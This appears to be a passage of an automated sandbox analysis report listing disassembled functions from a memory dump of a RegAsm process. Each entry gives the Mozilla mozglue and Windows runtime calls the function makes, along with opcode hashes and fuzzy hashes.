                                                        • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                        • String ID:
                                                        • API String ID: 2803333873-0
                                                        • Opcode ID: 0cc0ce2f1769d986de2c2ca3cce6b5b63c10c5bafd9e1cb289bb59c15cd07a47
                                                        • Instruction ID: dc4ec624cce4f97183edbe94293bc01a29784c22ad852838e829622e38eb70ce
                                                        • Opcode Fuzzy Hash: 0cc0ce2f1769d986de2c2ca3cce6b5b63c10c5bafd9e1cb289bb59c15cd07a47
                                                        • Instruction Fuzzy Hash: 1261DE75A083408BDB10DF24C880B9AB7F5BFD6318F14892DE89947B11EB39E959CB81
                                                        Function 6C0CE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(?,?,?,6C0D1999), ref: 6C0CEA39
                                                        • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C0CEA5C
                                                        • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C0CEA76
                                                        • moz_xmalloc.MOZGLUE(-00000001,?,?,6C0D1999), ref: 6C0CEA9D
                                                        • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C0D1999), ref: 6C0CEAC2
                                                        • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C0CEADC
                                                        • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C0CEB0B
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C0CEB27
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                        • String ID:
                                                        • API String ID: 706364981-0
                                                        • Opcode ID: e49c97b6b1af88dcafa2f3cecdcaeb19604ef255b4661995a8ced846d843eddf
                                                        • Instruction ID: cb17c159c225654b3c9be5f3aa6b85204bdf6730e0f07ea5a22a1785e8f7eba9
                                                        • Opcode Fuzzy Hash: e49c97b6b1af88dcafa2f3cecdcaeb19604ef255b4661995a8ced846d843eddf
                                                        • Instruction Fuzzy Hash: AD4183B1A002159FDB14CF68DC81BAE77E4BF55258F250628E825E7794E730EA0487D2
                                                        Function 6C11D310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C11D36B
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D38A
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D39D
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D3E1
                                                        • free.MOZGLUE ref: 6C11D408
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D44B
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D457
                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6C11D472
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
                                                        • String ID:
                                                        • API String ID: 3843575911-0
                                                        • Opcode ID: f46d178ef79e8dd8ed787d21155a46173ca45b87c1a0e3f31a10533c3e2f2745
                                                        • Instruction ID: cd9b139cf988dcc65df3e25e61354528ed48bb75209fb1cc646ac2c414c5ae92
                                                        • Opcode Fuzzy Hash: f46d178ef79e8dd8ed787d21155a46173ca45b87c1a0e3f31a10533c3e2f2745
                                                        • Instruction Fuzzy Hash: BA41CFB56083058FC710EF65C444B9FBBB5FF85318F10892DE96297B40EB34A948CB91
                                                        Function 6C0CB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB6AC
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB6D1
                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB6E3
                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB70B
                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB71D
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C0CB61E), ref: 6C0CB73F
                                                        • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB760
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB79A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                        • String ID:
                                                        • API String ID: 1394714614-0
                                                        • Opcode ID: 4ecb9cc8c06ead68735d734ba3a9aca686ab60b703a26d208ee2616996ff5b28
                                                        • Instruction ID: 1f883ae7321eaac905d09397d17ab8de1d291f5186090cabe16e7fb49ab69fc4
                                                        • Opcode Fuzzy Hash: 4ecb9cc8c06ead68735d734ba3a9aca686ab60b703a26d208ee2616996ff5b28
                                                        • Instruction Fuzzy Hash: EB41B6B2E001159FCB14DF68DC907AEB7F9BB44324F250769E825E7790D731AA1487D2
                                                        Function 6C0CEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(6C145104), ref: 6C0CEFAC
                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0CEFD7
                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0CEFEC
                                                        • free.MOZGLUE(?), ref: 6C0CF00C
                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0CF02E
                                                        • memcpy.VCRUNTIME140(00000000,?), ref: 6C0CF041
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF065
                                                        • moz_xmalloc.MOZGLUE ref: 6C0CF072
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                        • String ID:
                                                        • API String ID: 1148890222-0
                                                        • Opcode ID: 52e293b04337f24fdddcedefbfb68a87dc9ecb7370e00e3af99ee5ec009f399d
                                                        • Instruction ID: 15df3a062adf4494504566fcc3122fa505ce7da967b67a552df70127549dc932
                                                        • Opcode Fuzzy Hash: 52e293b04337f24fdddcedefbfb68a87dc9ecb7370e00e3af99ee5ec009f399d
                                                        • Instruction Fuzzy Hash: 59410CB1B002159FCB08CF68D8816AE73A9BF84314B34422CE815DB794EB31E915C7E2
                                                        Function 6C13B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C13B5B9
                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C13B5C5
                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C13B5DA
                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C13B5F4
                                                        • __Init_thread_footer.LIBCMT ref: 6C13B605
                                                        • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C13B61F
                                                        • std::_Facet_Register.LIBCPMT ref: 6C13B631
                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C13B655
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                        • String ID:
                                                        • API String ID: 1276798925-0
                                                        • Opcode ID: 33978cc8f177d640adad2b935181d1fffbf0cee7466ae4c1c1fbe492d700c554
                                                        • Instruction ID: ed6d73f84b519e45c565c9b3d9814bad122e8f3cb79622634feb92af13ce31f7
                                                        • Opcode Fuzzy Hash: 33978cc8f177d640adad2b935181d1fffbf0cee7466ae4c1c1fbe492d700c554
                                                        • Instruction Fuzzy Hash: 3731F471B00614CBCF00EFA8C8589AEB7B5FF8A32CF144569D92697740EB30A806DF91
                                                        Function 6C0D9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • free.MOZGLUE(?,?,?,6C127ABE), ref: 6C0D985B
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C127ABE), ref: 6C0D98A8
                                                        • moz_xmalloc.MOZGLUE(00000020), ref: 6C0D9909
                                                        • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C0D9918
                                                        • free.MOZGLUE(?), ref: 6C0D9975
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 1281542009-0
                                                        • Opcode ID: a83aca66702f11091e622372851c2b4fb5a59d9cfdaa2b45353db1e64bc8aff6
                                                        • Instruction ID: 044bc05583cf156e34d2a8719c17ea5815d3faaae4e1fabf649bf3f083c8c020
                                                        • Opcode Fuzzy Hash: a83aca66702f11091e622372851c2b4fb5a59d9cfdaa2b45353db1e64bc8aff6
                                                        • Instruction Fuzzy Hash: 0B718A756047058FC725CF2CC490A5AF7F1FF4A328B664AADD85A8BB90DB31B841CB90
                                                        Function 6C0DB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE,?,?,6C10DC2C), ref: 6C0DB7E6
                                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE,?,?,6C10DC2C), ref: 6C0DB80C
                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE), ref: 6C0DB88E
                                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE,?,?,6C10DC2C), ref: 6C0DB896
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                        • String ID:
                                                        • API String ID: 922945588-0
                                                        • Opcode ID: b969f5dccd4677c9612c42c5fcc28c520e9e656356045f5e82ed1c65b8044546
                                                        • Instruction ID: d3492c36faf0f57f48298a5fc0a02a8191dfaa8344c05590bcb7da2b7215dedb
                                                        • Opcode Fuzzy Hash: b969f5dccd4677c9612c42c5fcc28c520e9e656356045f5e82ed1c65b8044546
                                                        • Instruction Fuzzy Hash: 145168357006008FCB25DF59C494A6ABBF5FF89318B6A859DE99A87351C731F802CB80
                                                        Function 6C104AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104B48
                                                        • free.MOZGLUE(?,?,?,80000000,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104B7F
                                                        • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104B94
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104BBC
                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104BEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                        • String ID: pid:
                                                        • API String ID: 1916652239-3403741246
                                                        • Opcode ID: 3684549bda0e5f9dcfd95aac27dd2671574e15d76bb257823378585191133315
                                                        • Instruction ID: 606d373748da29ba43b9dc0729f96c014195e3a1ab3be393957ab6c131ef093f
                                                        • Opcode Fuzzy Hash: 3684549bda0e5f9dcfd95aac27dd2671574e15d76bb257823378585191133315
                                                        • Instruction Fuzzy Hash: 064109717042159BCB14CFB8DCC069FBBF9AF95228B144638E969D7781DB30E908C7A1
                                                        Function 6C111D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C111D0F
                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6C111BE3,?,?,6C111D96,00000000), ref: 6C111D18
                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6C111BE3,?,?,6C111D96,00000000), ref: 6C111D4C
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C111DB7
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C111DC0
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C111DDA
                                                          • Part of subcall function 6C111EF0: GetCurrentThreadId.KERNEL32 ref: 6C111F03
                                                          • Part of subcall function 6C111EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C111DF2,00000000,00000000), ref: 6C111F0C
                                                          • Part of subcall function 6C111EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C111F20
                                                        • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C111DF4
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 1880959753-0
                                                        • Opcode ID: bc930628359d71a51f139f2a36c2c56a924a45db60cef029f2d527acfb517556
                                                        • Instruction ID: 61c09496964f29c9b498bf0771f635a6f1533e957019fe5288a971e2b538ba46
                                                        • Opcode Fuzzy Hash: bc930628359d71a51f139f2a36c2c56a924a45db60cef029f2d527acfb517556
                                                        • Instruction Fuzzy Hash: CF4188B52007009FCB10DF28C488B5ABBF9FB99318F10842DE95A87B41DB35F854CB91
                                                        Function 6C10D210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C0D5820,?), ref: 6C10D21F
                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,6C0D5820,?), ref: 6C10D22E
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C0D5820,?), ref: 6C10D242
                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,6C0D5820,?), ref: 6C10D253
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                        • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C0D5820,?), ref: 6C10D280
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                        • String ID: Xl
                                                        • API String ID: 2029485308-309550100
                                                        • Opcode ID: 8e8122c47098c2e3db4100d4388e7f442ec6fd5287ec6048602b01b67edc8ac9
                                                        • Instruction ID: 3b3e19aca3bcebd77bf00f34d18f80fa6a5edb9c255e2ec553dcd61af44abedd
                                                        • Opcode Fuzzy Hash: 8e8122c47098c2e3db4100d4388e7f442ec6fd5287ec6048602b01b67edc8ac9
                                                        • Instruction Fuzzy Hash: 993107B5B012158FCB00EF58C880AAEBBB5FF99308F254169D914AB701D772F806CBE1
                                                        Function 6C12AAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14E220,?), ref: 6C12BC2D
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14E220), ref: 6C12BC42
                                                        • RtlFreeHeap.NTDLL(?,00000000,6C13E300), ref: 6C12BC82
                                                        • RtlFreeUnicodeString.NTDLL(6C14E210), ref: 6C12BC91
                                                        • RtlFreeUnicodeString.NTDLL(6C14E208), ref: 6C12BCA3
                                                        • RtlFreeHeap.NTDLL(?,00000000,6C14E21C), ref: 6C12BCD2
                                                        • free.MOZGLUE(?), ref: 6C12BCD8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                        • String ID:
                                                        • API String ID: 3047341122-0
                                                        • Opcode ID: c0a0ef0c1b39b2978bfafe293344a86bebce95c098db37997fb739b3b1be4ba7
                                                        • Instruction ID: 29c1fe2160a838a8b22b1bfd7654ed168e43101bf1ab46e2333639df8bbfc8b8
                                                        • Opcode Fuzzy Hash: c0a0ef0c1b39b2978bfafe293344a86bebce95c098db37997fb739b3b1be4ba7
                                                        • Instruction Fuzzy Hash: 4C21BF7A600714CFE7209F0AC880B66B7E9BF41718F158469E81A5BA10CB79F895CBD0
                                                        Function 6C0D38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14E220,?,?,?,?,6C0D3899,?), ref: 6C0D38B2
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14E220,?,?,?,6C0D3899,?), ref: 6C0D38C3
                                                        • free.MOZGLUE(00000000,?,?,?,6C0D3899,?), ref: 6C0D38F1
                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D3920
                                                        • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C0D3899,?), ref: 6C0D392F
                                                        • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C0D3899,?), ref: 6C0D3943
                                                        • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C0D396E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                        • String ID:
                                                        • API String ID: 3047341122-0
                                                        • Opcode ID: 07a580446a2eef3d74ff054405a3c79108f53ba1a1948677a6d89aa1f6463e1e
                                                        • Instruction ID: bff69856fcf641b5696a4c8749b5c3e9433615a4b35139ac0f546dd18f2998ab
                                                        • Opcode Fuzzy Hash: 07a580446a2eef3d74ff054405a3c79108f53ba1a1948677a6d89aa1f6463e1e
                                                        • Instruction Fuzzy Hash: 1821D376600720DFE710DF15C880B9AB7F5EF49328F168429D95A97B10C731F885CB90
                                                        Function 6C1084E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1084F3
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10850A
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10851E
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10855B
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10856F
                                                        • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1085AC
